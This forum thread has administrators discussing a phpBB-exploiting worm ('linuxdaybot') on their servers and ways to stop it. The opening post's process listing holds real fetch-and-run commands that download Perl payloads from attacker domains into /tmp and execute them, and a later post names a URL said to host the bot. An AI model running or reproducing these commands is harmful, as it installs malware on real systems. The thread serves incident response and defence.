Help! bot using my resources

[petfut]

I have .linuxdaybot running from my tmp dir.
There is currently several bots running:

18367 nobody 0 0.0 0.1 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
18368 nobody 0 0.0 0.2 wget worm.linuxday.com.br -O /tmp/.linuxdayworm
18421 nobody 0 0.0 0.1 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
18422 nobody 0 0.0 0.2 wget bot.linuxday.com.br -O /tmp/.linuxdaybot
18537 nobody 0 0.0 0.1 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
18538 nobody 0 0.0 0.2 wget worm.linuxday.com.br -O /tmp/.linuxdayworm
18551 nobody 0 0.0 0.1 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
18552 nobody 0 0.0 0.2 wget bot.linuxday.com.br -O /tmp/.linuxdaybot

I don't know how to make it stop..
Killing wont help, it'll start over again and removing from tmp just makes it disappear for a minute.

[petfut]

Got it stop. I put the ip to iptaples, to hosts.deny list and restarted apache.
It is some Korean website nbtour.co.kr

[gorilla]

have a look at this tutorial http://forums.cpanel.net/showthread....ecuring+server

[gongpro]

This worm still seams to be going around. I have been hit twice in the last to weeks. During my research of this, found that one issue allowing this worm in is an outdated phpBB. I believe it was an issue with version 2.0.14 and older.

At this time, http://www.pivadesign.com.br/rc/linuxdaybot.txt seams to be the source of the file.

[jameshsi]

Hey, Guys:
I encounter the same problems here, I put the IP into deny list and restart apache, then delete these files in /tmp , it seems OK by now, but I have 2 concerns:
1. Is there any other files edit by this worm ?
2. How should I do to correct the phpbb scripts ? My phpbb has some modifiction by me, and if I just upgrade it, something will go wrong, so I need to find out how to correct the hole in phpbb scripts, any advice ?

[johny_gjx]

phpBB has mods for every version that describes the changes as well as files you may use with patch command in linux, however both may fail depending on how your custom modifications have altered codes. The best is to look through the mods and try to apply them one by one so you will see conflicts and would be able to ignore minor differences due to mods.

Even if you use the patch command and do a partially successful upgrade it would be better than just trying to figure out holes and fixing them.

as for the server related question it's not possible to predict what may happen but see WHT for tutorials on securing /tmp and if on a VPS then it would be hard to secure that completely but at the last one can set a cron command to be notified of everything with x permission there daily.

[jameshsi]

After I chmod 700 wget, it seems OK by now although the phpbb still remain not upgrade.

[johny_gjx]

I don't know but what abut GET and lynx and curl? lynx has --dump switch thats why it came to my mind here.

[jameshsi]

I just found hacker will use lwp-download to download files, so , I just chmod 700 to lwp-download.

[tazman2000]

I've been hacked twice on the latest IPB board scripts, so I'm currently converting them all to VB which I've never had any security issues with having run one for 5 years. Serves me right for going for the cheaper option

[jameshsi]

http://forums.cpanel.net/showthread....797#post258797